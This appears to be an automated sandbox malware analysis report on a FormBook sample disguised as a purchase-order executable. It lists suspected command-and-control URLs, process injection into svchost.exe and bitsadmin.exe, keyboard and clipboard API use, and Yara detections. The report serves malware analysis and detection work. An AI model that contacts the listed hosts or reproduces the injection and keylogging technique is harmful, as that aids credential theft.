                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 04 Dec 2024 11:53:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B6EF7CE246D813F2A67B6634ECF40471C09CEBEF703DFB544C06E69DC00Set-Cookie: _csrf=747b8697c02316fcf19e7214b88d47110cd215a6080696d3778b8b37088faef7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-jrt7cPQ7j7vxss_Mw9RmJa8woAWmtNT%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 35 6f 49 52 34 4d 47 61 73 61 4b 77 30 65 72 71 71 4c 4d 50 6b 37 6a 78 62 6f 53 73 39 64 65 56 48 6d 32 79 6e 35 6c 77 68 34 47 38 48 6f 7a 74 47 55 36 6c 37 32 70 63 4e 33 53 30 62 39 68 41 35 54 38 36 48 5f 35 74 6d 59 6a 46 76 65 64 45 78 47 4d 53 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: svchost.exe, 00000001.00000003.1851384519.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851083063.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000003.2206906784.000000000114B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://server/get.asp
                Source: bitsadmin.exe, 00000004.00000002.4115599772.000000000455C000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4117808293.0000000006540000.00000004.00000800.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4115123582.00000000039DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3
                Source: hLRGQqcplWvpUw.exe, 00000007.00000002.4117111147.0000000005445000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yvcp3.info
                Source: hLRGQqcplWvpUw.exe, 00000007.00000002.4117111147.0000000005445000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yvcp3.info/x20l/
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: bitsadmin.exe, 00000004.00000002.4115599772.00000000040A6000.00000004.10000000.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4115123582.0000000003526000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: bitsadmin.exe, 00000004.00000003.2065272549.0000000007FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: bitsadmin.exe, 00000004.00000002.4115599772.0000000004EC8000.00000004.10000000.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4115123582.0000000004348000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hostgator.com.br
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C84164
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C84164
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C83F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C83F66
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00C7001C
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C9CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00C9CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4114791942.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4117111147.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1895662906.0000000006D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4113656138.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4114738212.0000000003230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1883944233.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1885773704.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4114931150.0000000004180000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: This is a third-party compiled AutoIt script.0_2_00C13B3A
                Source: PO 4110007694.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: PO 4110007694.exe, 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a925af6b-8
                Source: PO 4110007694.exe, 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_530d6616-6
                Source: PO 4110007694.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ace3854b-9
                Source: PO 4110007694.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e198103f-0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042CA93 NtClose,1_2_0042CA93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B60 NtClose,LdrInitializeThunk,1_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk,1_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674340 NtSetContextThread,1_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674650 NtSuspendThread,1_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BE0 NtQueryValueKey,1_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BF0 NtAllocateVirtualMemory,1_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BA0 NtEnumerateValueKey,1_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B80 NtQueryInformationFile,1_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AF0 NtWriteFile,1_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AD0 NtReadFile,1_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AB0 NtWaitForSingleObject,1_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F60 NtCreateProcessEx,1_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F30 NtCreateSection,1_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FE0 NtCreateFile,1_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FA0 NtQuerySection,1_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FB0 NtResumeThread,1_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F90 NtProtectVirtualMemory,1_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E30 NtWriteVirtualMemory,1_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EE0 NtQueueApcThread,1_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EA0 NtAdjustPrivilegesToken,1_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E80 NtReadVirtualMemory,1_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D30 NtUnmapViewOfSection,1_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D00 NtSetInformationFile,1_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D10 NtMapViewOfSection,1_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DD0 NtDelayExecution,1_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DB0 NtEnumerateKey,1_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C60 NtCreateKey,1_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C70 NtFreeVirtualMemory,1_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C00 NtQueryInformationProcess,1_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CF0 NtOpenProcess,1_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CC0 NtQueryVirtualMemory,1_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CA0 NtQueryInformationToken,1_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673010 NtOpenDirectoryObject,1_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673090 NtSetValueKey,1_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036739B0 NtGetContextThread,1_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D70 NtOpenThread,1_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D10 NtOpenProcessToken,1_2_03673D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D4340 NtSetContextThread,LdrInitializeThunk,4_2_034D4340
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D4650 NtSuspendThread,LdrInitializeThunk,4_2_034D4650
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2B60 NtClose,LdrInitializeThunk,4_2_034D2B60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_034D2BE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_034D2BF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_034D2BA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2AD0 NtReadFile,LdrInitializeThunk,4_2_034D2AD0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2AF0 NtWriteFile,LdrInitializeThunk,4_2_034D2AF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2F30 NtCreateSection,LdrInitializeThunk,4_2_034D2F30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2FE0 NtCreateFile,LdrInitializeThunk,4_2_034D2FE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2FB0 NtResumeThread,LdrInitializeThunk,4_2_034D2FB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_034D2EE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_034D2E80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_034D2D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_034D2D30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2DD0 NtDelayExecution,LdrInitializeThunk,4_2_034D2DD0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_034D2DF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2C60 NtCreateKey,LdrInitializeThunk,4_2_034D2C60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_034D2C70
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_034D2CA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D35C0 NtCreateMutant,LdrInitializeThunk,4_2_034D35C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D39B0 NtGetContextThread,LdrInitializeThunk,4_2_034D39B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2B80 NtQueryInformationFile,4_2_034D2B80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2AB0 NtWaitForSingleObject,4_2_034D2AB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2F60 NtCreateProcessEx,4_2_034D2F60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2F90 NtProtectVirtualMemory,4_2_034D2F90
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2FA0 NtQuerySection,4_2_034D2FA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2E30 NtWriteVirtualMemory,4_2_034D2E30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2EA0 NtAdjustPrivilegesToken,4_2_034D2EA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2D00 NtSetInformationFile,4_2_034D2D00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2DB0 NtEnumerateKey,4_2_034D2DB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2C00 NtQueryInformationProcess,4_2_034D2C00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2CC0 NtQueryVirtualMemory,4_2_034D2CC0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2CF0 NtOpenProcess,4_2_034D2CF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D3010 NtOpenDirectoryObject,4_2_034D3010
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D3090 NtSetValueKey,4_2_034D3090
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D3D70 NtOpenThread,4_2_034D3D70
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D3D10 NtOpenProcessToken,4_2_034D3D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02BA9220 NtCreateFile,4_2_02BA9220
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02BA9390 NtReadFile,4_2_02BA9390
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02BA9690 NtAllocateVirtualMemory,4_2_02BA9690
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02BA9480 NtDeleteFile,4_2_02BA9480
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02BA9520 NtClose,4_2_02BA9520
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00C7A1EF
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C68310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C68310
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00C751BD
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3D9750_2_00C3D975
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C321C50_2_00C321C5
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C462D20_2_00C462D2
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C903DA0_2_00C903DA
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C4242E0_2_00C4242E
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C325FA0_2_00C325FA
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C266E10_2_00C266E1
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C1E6A00_2_00C1E6A0
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C6E6160_2_00C6E616
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C4878F0_2_00C4878F
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C788890_2_00C78889
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C468440_2_00C46844
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C908570_2_00C90857
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C288080_2_00C28808
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3CB210_2_00C3CB21
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C46DB60_2_00C46DB6
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C26F9E0_2_00C26F9E
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C230300_2_00C23030
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3F1D90_2_00C3F1D9
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C331870_2_00C33187
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C112870_2_00C11287
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C314840_2_00C31484
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C255200_2_00C25520
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C376960_2_00C37696
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C257600_2_00C25760
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C319780_2_00C31978
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C49AB50_2_00C49AB5
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C1FCE00_2_00C1FCE0
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C97DDB0_2_00C97DDB
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C31D900_2_00C31D90
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3BDA60_2_00C3BDA6
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C23FE00_2_00C23FE0
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C1DF000_2_00C1DF00
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_017E22E00_2_017E22E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004189931_2_00418993
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401ACB1_2_00401ACB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042F0B31_2_0042F0B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101D31_2_004101D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004032F01_2_004032F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402A901_2_00402A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E3D31_2_0040E3D3
